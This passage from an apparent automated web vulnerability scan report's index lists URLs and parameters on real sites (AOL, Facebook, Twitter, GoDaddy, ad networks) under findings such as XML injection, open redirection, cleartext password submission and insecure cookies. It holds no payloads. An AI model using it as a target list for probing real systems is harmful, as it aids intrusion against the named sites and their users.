5.237. http://mmafighting.com/traffic/ [cb parameter]

5.238. http://mmafighting.com/traffic/ [lg parameter]

5.239. http://mmafighting.com/traffic/ [name of an arbitrarily supplied request parameter]

5.240. http://mmafighting.com/traffic/ [os parameter]

5.241. http://mmafighting.com/traffic/ [pw parameter]

5.242. http://mmafighting.com/traffic/ [rsv parameter]

5.243. http://mmafighting.com/traffic/ [rv parameter]

5.244. http://mmafighting.com/traffic/ [t parameter]

5.245. http://mmafighting.com/traffic/ [tz parameter]

5.246. http://switched.com/ [name of an arbitrarily supplied request parameter]

5.247. http://view.c3metrics.com/c3VTabstrct-6-2.php [C3UID cookie]

5.248. http://walletpop.com/ [name of an arbitrarily supplied request parameter]

5.249. http://www.aol.com/ [dlact cookie]

5.250. http://www.aol.com/ [rrpmo1 cookie]

5.251. http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259 [REST URL parameter 3]

5.252. http://www.facebook.com/people/Bucky-Jordan%20/100000824820783 [REST URL parameter 3]

5.253. http://www.facebook.com/people/Bucky-Jordan/100000824820783 [REST URL parameter 3]

5.254. http://www.facebook.com/people/Bucky-Jordan/100000824820783/x22 [REST URL parameter 4]

6. Flash cross-domain policy

6.1. http://a0.twimg.com/crossdomain.xml

6.2. http://about-search.aol.com/crossdomain.xml

6.3. http://ad.doubleclick.net/crossdomain.xml

6.4. http://ads.pointroll.com/crossdomain.xml

6.5. http://ads.undertone.com/crossdomain.xml

6.6. http://adx.adnxs.com/crossdomain.xml

6.7. http://altfarm.mediaplex.com/crossdomain.xml

6.8. http://apartments.rentedspaces.oodle.com/crossdomain.xml

6.9. http://api.bit.ly/crossdomain.xml

6.10. http://api.oscar.aol.com/crossdomain.xml

6.11. http://api.screenname.aol.com/crossdomain.xml

6.12. https://api.screenname.aol.com/crossdomain.xml

6.13. http://ar.voicefive.com/crossdomain.xml

6.14. http://at.atwola.com/crossdomain.xml

6.15. https://at.atwola.com/crossdomain.xml

6.16. http://b.scorecardresearch.com/crossdomain.xml

6.17. http://b.voicefive.com/crossdomain.xml

6.18. http://bongo.zoomin.tv/crossdomain.xml

6.19. http://browser.cdn.aol.com/crossdomain.xml

6.20. http://bs.serving-sys.com/crossdomain.xml

6.21. http://c.brightcove.com/crossdomain.xml

6.22. http://cdn.at.atwola.com/crossdomain.xml

6.23. http://cdn.cinesport.com/crossdomain.xml

6.24. http://cdn.digitalcity.com/crossdomain.xml

6.25. http://cdn.eyewonder.com/crossdomain.xml

6.26. http://cdn4.eyewonder.com/crossdomain.xml

6.27. http://clk.atdmt.com/crossdomain.xml

6.28. http://config.hulu.com/crossdomain.xml

6.29. http://content.mqcdn.com/crossdomain.xml

6.30. http://coverage.mqcdn.com/crossdomain.xml

6.31. http://d.tradex.openx.com/crossdomain.xml

6.32. http://d.xp1.ru4.com/crossdomain.xml

6.33. http://d1.openx.org/crossdomain.xml

6.34. http://daol.aol.com/crossdomain.xml

6.35. http://eatps.web.aol.com:9000/crossdomain.xml

6.36. http://expapi.oscar.aol.com/crossdomain.xml

6.37. http://external.ak.fbcdn.net/crossdomain.xml

6.38. http://fls.doubleclick.net/crossdomain.xml

6.39. http://graph.facebook.com/crossdomain.xml

6.40. http://gravatar.com/crossdomain.xml

6.41. http://ib.adnxs.com/crossdomain.xml

6.42. http://idcs.interclick.com/crossdomain.xml

6.43. http://img-cdn.mediaplex.com/crossdomain.xml

6.44. http://img.mediaplex.com/crossdomain.xml

6.45. http://lifestream.aol.com/crossdomain.xml

6.46. http://log30.doubleverify.com/crossdomain.xml

6.47. http://metrics.apple.com/crossdomain.xml

6.48. http://mobile.aol.com/crossdomain.xml

6.49. http://o.sa.aol.com/crossdomain.xml

6.50. http://pixel.quantserve.com/crossdomain.xml

6.51. http://portal.pf.aol.com/crossdomain.xml

6.52. http://puma.vizu.com/crossdomain.xml

6.53. http://r.unicornmedia.com/crossdomain.xml

6.54. http://r1-ads.ace.advertising.com/crossdomain.xml

6.55. http://s.gravatar.com/crossdomain.xml

6.56. http://s3.cinesport.com/crossdomain.xml

6.57. http://search.twitter.com/crossdomain.xml

6.58. http://secure-us.imrworldwide.com/crossdomain.xml

6.59. http://segment-pixel.invitemedia.com/crossdomain.xml

6.60. http://speed.pointroll.com/crossdomain.xml

6.61. http://sportingnews.122.2o7.net/crossdomain.xml

6.62. http://sportsillustrated.cnn.com/crossdomain.xml

6.63. http://t.mookie1.com/crossdomain.xml

6.64. http://tcr.tynt.com/crossdomain.xml

6.65. http://www.aolcdn.com/crossdomain.xml

6.66. http://www.everydayhealth.com/crossdomain.xml

6.67. http://www.huffingtonpost.com/crossdomain.xml

6.68. http://www.mapquest.com/crossdomain.xml

6.69. http://xml.truveo.com/crossdomain.xml

6.70. http://abcnews.go.com/crossdomain.xml

6.71. http://about.aol.com/crossdomain.xml

6.72. http://ad.wsod.com/crossdomain.xml

6.73. http://add.my.yahoo.com/crossdomain.xml

6.74. http://ads.tw.adsonar.com/crossdomain.xml

6.75. https://adwords.google.com/crossdomain.xml

6.76. http://aol.sportingnews.com/crossdomain.xml

6.77. http://aol.worldwinner.com/crossdomain.xml

6.78. http://api.local.yahoo.com/crossdomain.xml

6.79. http://ar-ar.facebook.com/crossdomain.xml

6.80. http://ax.itunes.apple.com/crossdomain.xml

6.81. http://developers.facebook.com/crossdomain.xml

6.82. http://disqus.com/crossdomain.xml

6.83. http://fantasysource.sportingnews.com/crossdomain.xml

6.84. http://feeds.bbci.co.uk/crossdomain.xml

6.85. http://googleads.g.doubleclick.net/crossdomain.xml

6.86. http://images.apple.com/crossdomain.xml

6.87. http://itunes.apple.com/crossdomain.xml

6.88. http://js.adsonar.com/crossdomain.xml

6.89. http://legal.aol.com/crossdomain.xml

6.90. http://money.cnn.com/crossdomain.xml

6.91. http://music.aol.com/crossdomain.xml

6.92. http://my.screenname.aol.com/crossdomain.xml

6.93. https://my.screenname.aol.com/crossdomain.xml

6.94. http://newsrss.bbc.co.uk/crossdomain.xml

6.95. http://o.aolcdn.com/crossdomain.xml

6.96. http://pagead2.googlesyndication.com/crossdomain.xml

6.97. http://picasaweb.google.com/crossdomain.xml

6.98. http://privacy.aol.com/crossdomain.xml

6.99. http://pubads.g.doubleclick.net/crossdomain.xml

6.100. http://realestate.aol.com/crossdomain.xml

6.101. http://redir.adsonar.com/crossdomain.xml

6.102. https://secure.opinionlab.com/crossdomain.xml

6.103. http://static.ak.fbcdn.net/crossdomain.xml

6.104. http://television.aol.com/crossdomain.xml

6.105. https://us.etrade.com/crossdomain.xml

6.106. http://video.aol.com/crossdomain.xml

6.107. http://video.foxbusiness.com/crossdomain.xml

6.108. http://video.google.com/crossdomain.xml

6.109. http://weather.aol.com/crossdomain.xml

6.110. http://www.aol.com/crossdomain.xml

6.111. http://www.aolnews.com/crossdomain.xml

6.112. http://www.apple.com/crossdomain.xml

6.113. http://www.blogsmithmedia.com/crossdomain.xml

6.114. http://www.citysbest.com/crossdomain.xml

6.115. http://www.dailyfinance.com/crossdomain.xml

6.116. http://www.dooce.com/crossdomain.xml

6.117. http://www.facebook.com/crossdomain.xml

6.118. https://www.facebook.com/crossdomain.xml

6.119. http://www.ft.com/crossdomain.xml

6.120. https://www.godaddy.com/crossdomain.xml

6.121. http://www.ibm.com/crossdomain.xml

6.122. http://www.marketwatch.com/crossdomain.xml

6.123. http://www.mmafighting.com/crossdomain.xml

6.124. http://www.moviefone.com/crossdomain.xml

6.125. http://www.netvibes.com/crossdomain.xml

6.126. http://www.pageflakes.com/crossdomain.xml

6.127. http://www.popeater.com/crossdomain.xml

6.128. http://www.realtytrac.com/crossdomain.xml

6.129. http://www.tuaw.com/crossdomain.xml

6.130. http://aolmobile.aol.com/crossdomain.xml

6.131. http://aolmobile.aolcdn.com/crossdomain.xml

6.132. http://api.twitter.com/crossdomain.xml

6.133. http://citi.bridgetrack.com/crossdomain.xml

6.134. http://docs.google.com/crossdomain.xml

6.135. http://s.stats.wordpress.com/crossdomain.xml

6.136. http://static.twitter.com/crossdomain.xml

6.137. http://stats.wordpress.com/crossdomain.xml

6.138. http://twitter.com/crossdomain.xml

6.139. https://twitter.com/crossdomain.xml

6.140. http://www.truveo.com/crossdomain.xml

7. Silverlight cross-domain policy

7.1. http://ad.doubleclick.net/clientaccesspolicy.xml

7.2. http://ads.pointroll.com/clientaccesspolicy.xml

7.3. http://api.oscar.aol.com/clientaccesspolicy.xml

7.4. http://b.scorecardresearch.com/clientaccesspolicy.xml

7.5. http://b.voicefive.com/clientaccesspolicy.xml

7.6. http://cdn.eyewonder.com/clientaccesspolicy.xml

7.7. http://clk.atdmt.com/clientaccesspolicy.xml

7.8. http://expapi.oscar.aol.com/clientaccesspolicy.xml

7.9. http://metrics.apple.com/clientaccesspolicy.xml

7.10. http://o.aolcdn.com/clientaccesspolicy.xml

7.11. http://o.sa.aol.com/clientaccesspolicy.xml

7.12. http://s.stats.wordpress.com/clientaccesspolicy.xml

7.13. http://secure-us.imrworldwide.com/clientaccesspolicy.xml

7.14. http://speed.pointroll.com/clientaccesspolicy.xml

7.15. http://sportingnews.122.2o7.net/clientaccesspolicy.xml

7.16. http://stats.wordpress.com/clientaccesspolicy.xml

7.17. http://www.aol.com/clientaccesspolicy.xml

7.18. http://ts1.mm.bing.net/clientaccesspolicy.xml

7.19. http://ts2.mm.bing.net/clientaccesspolicy.xml

8. Cleartext submission of password

8.1. http://appworld.blackberry.com/webstore/content/13833

8.2. http://appworld.blackberry.com/webstore/content/13833

8.3. http://appworld.blackberry.com/webstore/content/13833

8.4. http://appworld.blackberry.com/webstore/content/19143

8.5. http://appworld.blackberry.com/webstore/content/19143

8.6. http://appworld.blackberry.com/webstore/content/19143

8.7. http://digg.com/submit

8.8. http://o.aolcdn.com/art/merge/

8.9. http://portalblog.aol.com/2011/02/01/aol-across-the-web-and-beyond/

8.10. http://top-sec.net/vb/

8.11. http://top-sec.net/vb/calendar.php

8.12. http://top-sec.net/vb/faq.php

8.13. http://top-sec.net/vb/forumdisplay.php

8.14. http://top-sec.net/vb/index.php

8.15. http://top-sec.net/vb/login.php

8.16. http://top-sec.net/vb/member.php

8.17. http://top-sec.net/vb/memberlist.php

8.18. http://top-sec.net/vb/online.php

8.19. http://top-sec.net/vb/online.php

8.20. http://top-sec.net/vb/profile.php

8.21. http://top-sec.net/vb/profile.php

8.22. http://top-sec.net/vb/search.php

8.23. http://top-sec.net/vb/sendmessage.php

8.24. http://top-sec.net/vb/showgroups.php

8.25. http://top-sec.net/vb/showthread.php

8.26. http://top-sec.net/vb/tags.php

8.27. http://www.facebook.com/

8.28. http://www.facebook.com/r.php

8.29. http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/

8.30. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

9. XML injection

9.1. http://jb.speakertext.com/player/speakertext.css [REST URL parameter 1]

9.2. http://jb.speakertext.com/player/speakertext.css [REST URL parameter 2]

9.3. http://pixel.quantserve.com/seg/r [REST URL parameter 1]

9.4. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 1]

9.5. http://platform0.twitter.com/widgets/tweet_button.html [REST URL parameter 2]

9.6. http://platform1.twitter.com/widgets/tweet_button.html [REST URL parameter 1]

9.7. http://platform1.twitter.com/widgets/tweet_button.html [REST URL parameter 2]

9.8. http://platform2.twitter.com/widgets/tweet_button.html [REST URL parameter 1]

9.9. http://platform2.twitter.com/widgets/tweet_button.html [REST URL parameter 2]

9.10. http://use.typekit.com/p/uni0vle.js [REST URL parameter 1]

9.11. http://use.typekit.com/p/uni0vle.js [REST URL parameter 2]

10. SSL cookie without secure flag set

10.1. https://twitter.com/signup

10.2. https://www.fightmagazine.com/mma-magazine/subscribe.asp

10.3. https://www.godaddy.com/

10.4. https://www.godaddy.com/domains/search.aspx

10.5. https://account.login.aol.com/_cqr/opr/opr.psp

10.6. https://aolproductcentral.aol.com/ClickBroker

10.7. https://bill.aol.com/SPortal/jsp/main.jsp

10.8. https://bill.aol.com/SPortal/jsp/notify_about_notify.jsp

10.9. https://maps-api-ssl.google.com/maps

10.10. https://my.screenname.aol.com/_cqr/login/checkStatus.psp

10.11. https://my.screenname.aol.com/_cqr/login/jslogin.psp

10.12. https://my.screenname.aol.com/_cqr/login/login.psp

10.13. https://my.screenname.aol.com/_cqr/logout/mcLogout.psp

10.14. https://my.screenname.aol.com/badbrowser.psp

10.15. https://us.etrade.com/e/t/welcome/whychooseetrade

10.16. https://www.facebook.com/

10.17. https://www.facebook.com/ajax/intl/language_dialog.php

10.18. https://www.facebook.com/h02332

10.19. https://www.facebook.com/h02332

10.20. https://www.facebook.com/h02332

10.21. https://www.facebook.com/help/contact.php

10.22. https://www.facebook.com/login.php

10.23. https://www.facebook.com/pages/ToP-SeCNeT/195242630519520

10.24. https://www.facebook.com/pages/create.php

10.25. https://www.facebook.com/r.php

10.26. https://www.facebook.com/recover.php

10.27. https://www.godaddy.com/gdshop/hosting/landing.asp

10.28. https://www.godaddy.com/gdshop/registrar/search.asp

10.29. https://www.godaddy.com/gdshop/website.asp

11. Session token in URL

11.1. http://aolmobile.aol.com/registration/include/registration_unified.css

11.2. http://aolmobile.aol.com/registration/welcome

11.3. http://aolproductcentral.aol.com/category/pc-tools-and-storage/aol-computer-checkup/

11.4. http://aolproductcentral.aol.com/category/pc-tools-and-storage/aol-quick-check-live/

11.5. http://feedburner.google.com/fb/a/mailverify

11.6. https://new.aol.com/productsweb/subflows/FreeMemberRegistration/FreeAolRegistrationAction.do

11.7. http://weather.aol.com/

11.8. http://www.facebook.com/extern/login_status.php

12. SSL certificate

12.1. https://secure.opinionlab.com/

12.2. https://www.facebook.com/

12.3. https://account.login.aol.com/

12.4. https://adwords.google.com/

12.5. https://aolproductcentral.aol.com/

12.6. https://api.screenname.aol.com/

12.7. https://at.atwola.com/

12.8. https://bill.aol.com/

12.9. https://chrome.google.com/

12.10. https://maps-api-ssl.google.com/

12.11. https://my.screenname.aol.com/

12.12. https://new.aol.com/

12.13. https://rsp.web.aol.com/

12.14. https://spreadsheets.google.com/

12.15. https://twitter.com/

12.16. https://us.etrade.com/

12.17. https://www.fightmagazine.com/

12.18. https://www.godaddy.com/

12.19. https://www.neodata.com/

13. Password field submitted using GET method

13.1. http://digg.com/submit

13.2. http://o.aolcdn.com/art/merge/

14. ASP.NET ViewState without MAC enabled

14.1. http://www.bankrate.com/funnel/mortgages/

14.2. http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx

14.3. http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx

14.4. http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx

14.5. http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx

15. Open redirection

15.1. http://b.scorecardresearch.com/r [d.c parameter]

15.2. http://ib.adnxs.com/getuid [name of an arbitrarily supplied request parameter]

16. Cookie scoped to parent domain

16.1. http://api.twitter.com/

16.2. http://api.twitter.com/1/statuses/66119447177474049/retweeted_by.json

16.3. http://api.twitter.com/1/statuses/show.json

16.4. http://api.twitter.com/1/statuses/user_timeline.json

16.5. http://t.mookie1.com/t/v1/imp

16.6. http://www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

16.7. http://www.mapquest.com/

16.8. http://www.mapquest.com/_svc/ad/getads

16.9. http://www.mapquest.com/_svc/apixel

16.10. http://www.mapquest.com/_svc/publishing/promo

16.11. http://www.mapquest.com/_svc/searchio

16.12. http://www.mapquest.com/cdn/_uac/adpage.htm

16.13. http://www.mapquest.com/cdn/dotcom3/images/new_purple_button.jpg

16.14. http://www.mapquest.com/icons/stop.png

16.15. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

16.16. http://abcnews.go.com/Entertainment/popup

16.17. http://add.my.yahoo.com/content

16.18. http://ads.pointroll.com/PortalServe/

16.19. https://adwords.google.com/select/Login

16.20. http://adx.adnxs.com/mapuid

16.21. http://altfarm.mediaplex.com/ad/ck/10105-123060-1629-2

16.22. http://altfarm.mediaplex.com/ad/js/10105-123060-1629-2

16.23. http://altfarm.mediaplex.com/ad/js/10105-123060-1629-6

16.24. http://altfarm.mediaplex.com/ad/js/13198-126290-5934-6

16.25. http://altfarm.mediaplex.com/ad/js/14302-119028-16279-0

16.26. http://altfarm.mediaplex.com/ad/tr/10105-123060-1629-13

16.27. http://altfarm.mediaplex.com/ad/tr/10105-123060-1629-14

16.28. http://aol.worldwinner.com/cgi/welcome/21sie

16.29. http://aolmobile.aol.com/registration/changeSettings

16.30. http://aolmobile.aol.com/registration/deleteDevice

16.31. http://aolmobile.aol.com/registration/generateConfCode

16.32. http://aolmobile.aol.com/registration/validateConfirmCode

16.33. http://apartments.rentedspaces.oodle.com/

16.34. http://ar-ar.facebook.com/login.php

16.35. http://ar.voicefive.com/b/wc_beacon.pli

16.36. http://ar.voicefive.com/bmx3/broker.pli

16.37. http://ar.voicefive.com/bmx3/broker.pli

16.38. http://b.aol.com/vanity/

16.39. http://b.dailyfinance.com/vanity/

16.40. http://b.huffingtonpost.com/vanity/

16.41. http://b.mmafighting.com/vanity/

16.42. http://b.scorecardresearch.com/b

16.43. http://b.scorecardresearch.com/p

16.44. http://b.scorecardresearch.com/r

16.45. http://b.voicefive.com/b

16.46. http://bid.openx.net/json

16.47. http://blogsearch.google.com/

16.48. http://books.google.com/bkshp

16.49. http://books.google.com/books

16.50. http://bs.serving-sys.com/BurstingPipe/adServer.bs

16.51. http://bs.serving-sys.com/BurstingPipe/adServer.bs

16.52. http://cdn4.eyewonder.com/cm/js/10295-119241-2568-4

16.53. http://clk.atdmt.com/CNT/go/319709115/direct

16.54. http://clk.atdmt.com/M0N/go/314366790/direct

16.55. http://clk.atdmt.com/NYC/go/310177527/direct

16.56. http://clk.atdmt.com/go/253735206/direct

16.57. http://clk.atdmt.com/go/253735225/direct

16.58. http://clk.atdmt.com/go/253735228/direct

16.59. http://clk.atdmt.com/go/310177527/direct

16.60. http://clk.atdmt.com/go/314366790/direct

16.61. http://clk.atdmt.com/go/319709115/direct

16.62. http://developers.facebook.com/

16.63. http://developers.facebook.com/plugins/

16.64. http://feedburner.google.com/fb/a/mailverify

16.65. http://fls.doubleclick.net/activityi

16.66. http://fusion.google.com/add

16.67. http://googleads.g.doubleclick.net/aclk

16.68. http://graph.facebook.com/10134017/picture

16.69. http://groups.google.com/grphp

16.70. http://ib.adnxs.com/getuid

16.71. http://ib.adnxs.com/seg

16.72. http://id.google.com/verify/EAAAAC-C2hTTg1_wpgNVul6NqWU.gif

16.73. http://idcs.interclick.com/Segment.aspx

16.74. http://image3.pubmatic.com/AdServer/UPug

16.75. http://images.apple.com/global/nav/styles/navigation.css

16.76. http://leadback.advertising.com/adcedge/lb

16.77. https://maps-api-ssl.google.com/maps

16.78. http://maps.google.com/maps

16.79. http://picasaweb.google.com/data/feed/base/user/h02332/albumid/5537331698402427137

16.80. http://picasaweb.google.com/home

16.81. http://picasaweb.google.com/lh/view

16.82. http://pixel.quantserve.com/pixel

16.83. http://pixel.quantserve.com/pixel/p-3aud4J6uA4Z6Y.gif

16.84. http://pixel.quantserve.com/pixel/p-444Ux5EmpXDp6.gif

16.85. http://r1-ads.ace.advertising.com/click/site=0000743226/mnum=0000894907/cstr=63245784=_4dc1f5d8,2088728852,743226^894907^1183^0,1_/xsxdata=1:93232707/bnum=63245784/optn=64

16.86. http://r1-ads.ace.advertising.com/click/site=0000743227/mnum=0000894905/cstr=97154103=_4dc1f637,3024464342,743227^894905^1183^0,1_/xsxdata=1:93310501/bnum=97154103/optn=64

16.87. http://r1-ads.ace.advertising.com/click/site=0000800563/mnum=0000894873/cstr=84248618=_4dc1f63b,0642027268,800563^894873^1183^0,1_/xsxdata=$xsxdata/bnum=84248618/optn=64

16.88. http://r1-ads.ace.advertising.com/click/site=0000804145/mnum=0000894875/cstr=24626462=_4dc1f67d,5365043223,804145^894875^1183^0,1_/xsxdata=1:93312584/bnum=24626462/optn=64

16.89. http://r1-ads.ace.advertising.com/click/site=0000804145/mnum=0000956559/cstr=31568465=_4dc1f67d,1346633562,804145^956559^1183^0,1_/xsxdata=1:93313567/bnum=31568465/optn=64

16.90. http://r1-ads.ace.advertising.com/site=743206/size=300250/u=2/bnum=47128691/xsxdata=1:93306656/hr=0/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Fwww.mapquest.com%252F%253Fncid%253Dtxtlnkmqmq00000001

16.91. http://r1-ads.ace.advertising.com/site=743207/size=300250/u=2/bnum=29138469/xsxdata=1:93241795/hr=12/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Fmobile.aol.com%252Fproduct%252FAndroid%252Fdailyfinance%252F

16.92. http://r1-ads.ace.advertising.com/site=743207/size=300250/u=2/bnum=55333782/xsxdata=1:93241795/hr=12/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Fmobile.aol.com%252Fproduct%252FiPhone%252Fengadget%252F

16.93. http://r1-ads.ace.advertising.com/site=743226/size=728090/u=2/bnum=63245784/xsxdata=1:93232707/hr=0/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Fmusic.aol.com%252Fradioguide%252Fbb

16.94. http://r1-ads.ace.advertising.com/site=743227/size=300250/u=2/bnum=97154103/xsxdata=1:93310501/hr=0/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Frealestate.aol.com%252F%253Ficid%253Dnavbar_realest_main5

16.95. http://r1-ads.ace.advertising.com/site=790523/size=300250/u=2/bnum=26673240/xsxdata=1:93310299/hr=0/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/xscinfo=bsd:19931900/dref=http%253A%252F%252Fwww.mmafighting.com%252F2011%252F05%252F04%252Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%252F%253Ficid%253Dmaing-grid7%25257Cmain5%25257Cdl4%25257Csec3_lnk1%25257C60545

16.96. http://r1-ads.ace.advertising.com/site=790523/size=728090/u=2/bnum=35460744/xsxdata=1:93306882/hr=0/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/xscinfo=bsd:19931900/dref=http%253A%252F%252Fwww.mmafighting.com%252F2011%252F05%252F04%252Fformer-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11%252F%253Ficid%253Dmaing-grid7%25257Cmain5%25257Cdl4%25257Csec3_lnk1%25257C60545

16.97. http://r1-ads.ace.advertising.com/site=800563/size=300250/u=2/bnum=84248618/hr=0/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.huffingtonpost.com%252F%253Ficid%253Dnavbar_huffpo_main5

16.98. http://r1-ads.ace.advertising.com/site=804145/size=300250/u=2/bnum=31568465/xsxdata=1:93313567/hr=0/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Fwww.huffingtonpost.com%252F2011%252F05%252F04%252Fosama-bin-laden-pictures_n_857568.html

16.99. http://r1-ads.ace.advertising.com/site=804145/size=728090/u=2/bnum=24626462/xsxdata=1:93312584/hr=0/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=1/r=1/optn=1/fv=10/aolexp=1/aolexp=1/dref=http%253A%252F%252Fwww.huffingtonpost.com%252F2011%252F05%252F04%252Fosama-bin-laden-pictures_n_857568.html

16.100. http://realestate.aol.com/

16.101. http://scholar.google.com/schhp

16.102. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s32555036570411

16.103. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s34991793073713

16.104. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s41508008833043

16.105. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s41670060879550

16.106. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s42057272375095

16.107. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s42119171968661

16.108. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s42397612622007

16.109. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s42653564326465

16.110. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s42715447763912

16.111. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s42953626681119

16.112. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s42998947284650

16.113. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s43049185345880

16.114. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s4310452240519

16.115. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s43305702756624

16.116. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s43513301596976

16.117. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s43547210348770

16.118. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s4364950429648

16.119. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s43829343500547

16.120. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s4407522239256

16.121. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s4419304328970

16.122. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s4424447611439

16.123. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s44325433499179

16.124. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s44696885943412

16.125. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s44929469036869

16.126. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s45011387388221

16.127. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s45177161318715

16.128. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s45238099694252

16.129. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s45327582890167

16.130. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s45334947153460

16.131. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s45375636194366

16.132. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s45471094280947

16.133. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s45570401758886

16.134. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s45670967234764

16.135. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s45689243038650

16.136. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s45696645958814

16.137. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s46401418154127

16.138. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s46547738644294

16.139. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s46606079612392

16.140. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s46721464460715

16.141. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s46752376970835

16.142. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s4694483816623

16.143. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s47134800327476

16.144. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s47243939966429

16.145. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s47805332352872

16.146. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s47930286049377

16.147. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s48242398074362

16.148. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s4827615687157

16.149. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s48352218910586

16.150. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s48578549234662

16.151. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s48622659663669

16.152. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s48943998781032

16.153. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s49281189679168

16.154. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s49337460868991

16.155. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s49353421742562

16.156. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s49393149293027

16.157. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s49413108131848

16.158. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s49435746781527

16.159. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s49873315552249

16.160. http://sportingnews.122.2o7.net/b/ss/spnprod/1/H.15.1/s49904012384358

16.161. http://sportingnews.us.intellitxt.com/intellitxt/front.asp

16.162. http://tacoda.at.atwola.com/rtx/r.js

